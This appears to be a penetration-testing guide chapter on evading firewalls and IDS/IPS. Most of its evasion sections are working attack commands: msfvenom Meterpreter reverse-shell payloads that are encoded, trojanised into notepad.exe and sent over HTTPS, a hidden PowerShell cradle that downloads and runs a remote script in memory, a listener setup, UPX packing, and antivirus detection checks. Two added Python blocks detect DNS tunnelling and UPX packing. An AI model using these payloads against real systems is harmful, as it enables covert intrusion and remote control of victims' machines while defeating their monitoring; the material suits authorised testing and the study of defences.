# Firewall and IDS/IPS Evasion

## **Overview**

Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. As penetration testers, understanding how to bypass these defenses is essential for conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security.

## **Firewall and IDS/IPS Basics**

1. **Firewalls:**
   * Control traffic flow based on predefined rules.
   * Block or allow packets based on:
     * Source/Destination IP
     * Ports
     * Protocols
   * Types:
     * Network Firewalls (e.g., hardware-based solutions like Cisco ASA)
     * Host-Based Firewalls (e.g., Windows Defender Firewall)
2. **IDS/IPS:**
   * IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.
   * IPS (Intrusion Prevention System): Actively blocks malicious traffic.
   * Detection methods:
     * **Signature-Based:** Matches traffic patterns against known attack signatures.
     * **Anomaly-Based:** Flags traffic that deviates from normal behavior.

## **Techniques for Firewall Evasion**

1. **Port Spoofing:**
   * Send payload traffic over ports that perimeter firewalls almost always allow outbound (e.g., port 443, normally reserved for HTTPS) so that a plain `reverse_tcp` connection blends in with web traffic.
   * Example:

     ```bash
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe
     ```
2. **Payload Obfuscation:**
   * Encode payloads using tools like `msfvenom`:

     ```bash
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe
     ```
3. **Split Payload Delivery:**
   * Deliver the payload in stages or fragments so that no single transfer matches a large-payload filter.
   * Example: a small PowerShell download cradle as the first stage, which fetches the rest of the payload and executes it in memory:

     ```powershell
     powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"
     ```
4. **DNS Tunneling:**
   * Encapsulate payload traffic in DNS queries to bypass firewalls.
   * Example tool: `dnscat2`.
5. **HTTP/HTTPS Tunneling:**
   * Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.
   * Configure a reverse shell:

     ```bash
     msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
     ```
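DNS tunneling (item 4 above) leaves a recognisable footprint in resolver logs: many distinct, long, high-entropy subdomains under one parent domain. The following detection heuristic is an added example written for this page, not code from the page, from `dnscat2`, or from Metasploit; it runs over a constructed log sample and the thresholds (`min_len`, `min_entropy`, `min_unique`) are assumed starting points to tune against your own baseline.

```python
import math
from collections import defaultdict

# Constructed sample resolver log, "<time> <client> <query_name>" (not a real capture).
# The example-tunnel.test queries mimic encoded data in the leftmost label; the last
# line is a long but single benign name, which the unique-count threshold filters out.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 www.example.com
10:00:02 10.0.0.5 mail.example.com
10:00:03 10.0.0.7 9f3a1c7e2b8d4f6a0c1e3b5d7f9a2c4e.c2.example-tunnel.test
10:00:04 10.0.0.7 4e7b2d9c1f8a3e6b5d0c2f4a7e9b1d3c.c2.example-tunnel.test
10:00:05 10.0.0.7 a1b2c3d4e5f60718293a4b5c6d7e8f90.c2.example-tunnel.test
10:00:06 10.0.0.7 0f1e2d3c4b5a69788796a5b4c3d2e1f0.c2.example-tunnel.test
10:00:07 10.0.0.5 very-long-legitimate-hostname-01.cdn.example.com
"""

def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label (0.0 for empty/uniform)."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parent_domain(name: str) -> str:
    """Assumed 'registrable' parent: the last two labels (no public-suffix list here)."""
    parts = name.rstrip(".").split(".")
    return ".".join(parts[-2:])

def find_tunnel_candidates(log_text: str, min_len: int = 40,
                           min_entropy: float = 3.5, min_unique: int = 3) -> dict:
    """Return {parent_domain: unique_query_count} for parents that received at least
    min_unique distinct long, high-entropy query names, i.e. likely encoded payload."""
    unique_names = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue                      # skip malformed lines rather than crash
        qname = fields[2].lower()
        first_label = qname.split(".")[0]
        if len(qname) >= min_len and label_entropy(first_label) >= min_entropy:
            unique_names[parent_domain(qname)].add(qname)
    return {d: len(s) for d, s in unique_names.items() if len(s) >= min_unique}

if __name__ == "__main__":
    print(find_tunnel_candidates(SAMPLE_LOG))   # {'example-tunnel.test': 4}
```

Entropy alone misfires on long human-readable hostnames, which is why the heuristic also requires several distinct names per parent domain; in production, add a per-client query rate and an allowlist for known CDN and telemetry domains.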

## **Techniques for IDS/IPS Evasion**

1. **Signature Evasion:**
   * Modify payloads to avoid matching known attack patterns:

     ```bash
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe
     ```
2. **Traffic Encryption:**
   * Use encrypted channels (e.g., HTTPS) for command and control traffic.
   * Example (commands run inside `msfconsole`):

     ```bash
     use exploit/multi/handler
     set payload windows/meterpreter/reverse_https
     set LHOST <ip>
     set LPORT 443
     exploit
     ```
3. **Timing Attacks:**
   * Send traffic slowly or with delays between probes so that it stays below the rate thresholds that anomaly-based detection keys on.
   * Example: Use Nmap with timing options:

     ```bash
     nmap -T2 -sS <target_ip>
     ```
4. **Packer Tools:**
   * Use packers to obfuscate executable payloads.
   * Popular packers:
     * UPX:

       ```bash
       upx --best --lzma payload.exe
       ```
     * Themida: Advanced commercial packer with anti-reverse engineering features.
5. **Legitimate Application Templates:**
   * Embed payloads in legitimate applications or documents.
   * Example:

     ```bash
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe
     ```
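From the defender's side, the UPX packer in item 4 above is easy to spot because by default it names its PE sections `UPX0`, `UPX1` and `UPX2`. The following PE section-table parser is an added example written for this page (not code from the page, from UPX, or from Metasploit); it builds a minimal constructed PE skeleton as test input rather than reading a real binary.

```python
import struct

def build_fake_pe(section_names):
    """Construct a minimal PE skeleton (DOS header, PE signature, COFF header, section
    table) carrying the given section names. Test input for the parser only; it is
    not an executable and has no optional header (SizeOfOptionalHeader = 0)."""
    e_lfanew = 0x40                                       # offset of the "PE\0\0" signature
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    # Each IMAGE_SECTION_HEADER is 40 bytes; the 8-byte name comes first.
    section_table = b"".join(
        name.encode("ascii").ljust(8, b"\0") + b"\0" * 32 for name in section_names)
    return dos_header + b"PE\0\0" + coff + section_table

def pe_section_names(data: bytes) -> list:
    """Walk the PE headers and return the section names in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size      # section headers follow the optional header
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", errors="replace"))
    return names

def looks_upx_packed(data: bytes) -> bool:
    """True if any section name starts with 'UPX' (the packer's default UPX0/UPX1/UPX2)."""
    return any(name.startswith("UPX") for name in pe_section_names(data))

if __name__ == "__main__":
    sample = build_fake_pe(["UPX0", "UPX1", ".rsrc"])   # constructed, not a real binary
    print(pe_section_names(sample), looks_upx_packed(sample))
```

Section names are a weak indicator on their own; in a real triage pipeline pair this check with per-section entropy and import-table size, which packing also changes.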

## **Evasion Example: Using msfvenom with Custom Templates**

1. **Generate an Encoded Payload** (`shikata_ga_nai` is an encoder, not encryption, so treat this as obfuscation only):

   ```bash
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe
   ```
2. **Embed Payload in a Legitimate Application:**

   ```bash
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe
   ```
3. **Use HTTPS for Stealth:**

   ```bash
   msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
   ```
4. **Verify Payload Detection:**
   * Upload the payload to VirusTotal to check for AV detection:

     ```bash
     msf-virustotal -k <api_key> -f payload.exe
     ```

## **Best Practices for Evasion**

1. **Test in a Sandbox:**
   * Verify payload functionality in a controlled environment.
2. **Avoid Reuse:**
   * Customize payloads for each engagement to avoid detection by updated signatures.
3. **Combine Techniques:**
   * Layer multiple evasion methods (e.g., encoding + encryption).
4. **Stay Updated:**
   * Keep up with the latest evasion techniques and tools.

***

## **Command Cheatsheet**

| Command                       | Description                                  |
| ----------------------------- | -------------------------------------------- |
| `msfvenom -p <payload>`       | Generate payloads.                           |
| `msfvenom -e <encoder>`       | Encode payloads for evasion.                 |
| `upx --best --lzma <file>`    | Compress and obfuscate payloads.             |
| `msf-virustotal -k <api_key>` | Check payload detection rates on VirusTotal. |
| `nmap -T2`                    | Conduct slow scans to avoid IDS detection.   |

